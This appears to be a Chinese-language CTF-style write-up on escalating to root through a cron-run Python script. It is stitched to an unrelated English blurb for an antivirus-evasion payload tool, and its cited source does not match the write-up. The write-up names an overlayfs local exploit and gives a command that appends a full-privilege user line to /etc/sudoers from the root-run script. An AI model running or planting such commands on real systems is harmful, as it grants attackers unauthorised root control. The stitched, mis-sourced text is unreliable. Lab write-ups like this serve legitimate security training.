因為在進行這台主機的操作時，大概固定每幾分鐘就會自動被踢出連線，於是想說可能是有個腳本會定時的例行性工作排程剔除用戶，所以查詢該cron的log。

因為不知道cleaner.py在哪個位置，於是直接上find指令

find / -name cleaner.py

結果顯示在/lib/log目錄下。

這個python腳本是由root執行的，主要是會刪除 tmp目錄下的檔案。

那麼，因為有root的權限，且又是例行性工作排程，那麼我們是否能夠在該py腳本內寫個提權的方法呢?

如何知道該腳本是 例行性工作排程 ? ，只要在tmp目錄下寫個檔案，然後等個幾分鐘就知道了。

在本題中，有兩個方向可以提權為root權限。

1. 使用 overlayfs

2. 更改cleaner.py

那麼下面，我們分別講解下各個提權姿勢。

 

在本地寫入個overlayfs的c檔，然後gcc編下，按照exploit-db的教學就可以完成了

gcc ofs.c -o ofs

執行該提權程式，就成為root了。接著就直接訪問/root 目錄，查看該Flag。

第二個方法是更改 cleaner.py腳本

我們將原本的os.system('rm -r /tmp/*') 改成

os.system('echo "overflow ALL=(ALL:ALL) ALL " >> /etc/sudoers')

接著保存。

保存後，我們只要等待例行性工作排程到來，就會直接該腳本。

過幾分鐘後，我們的連線被斷線了，也代表排程執行了。

於是重新連上去就行了。

接著直接sudo su後，即可成為root。

密碼 Pass.txt

結束。

 

原文地址：https://www.kitploit.com/2019/03/phantom-evasion-python-av-evasion-tool.html

Phantom-Evasion is an interactive antivirus evasion tool written in python capable to generate (almost) FUD executable even with the most common 32 bit msfvenom payload (lower detection ratio with 64 bit payloads). The aim of this tool is to make antivirus evasion an easy task for pentesters through the use of modules focused on polymorphic code and antivirus sandbox detection techniques. Since version 1.0 Phantom-Evasion also include a post-exploitation section dedicated to persistence and auxiliary modules.

前言引用來源：https://www.kitploit.com/2019/03/phantom-evasion-python-av-evasion-tool.html
文章圖片來源：https://www.kitploit.com/2019/03/phantom-evasion-python-av-evasion-tool.html

－－－－－－－－－－－－－－－－－－－
如果你認同我們每日分享的文章，請幫我們按個讚並且點擊追蹤「搶先看」，讓我們提供最新消息給您！您的分享及點讚，是我們持續推廣資訊安全最大的動力來源。
https://www.facebook.com/LonelyPoPo/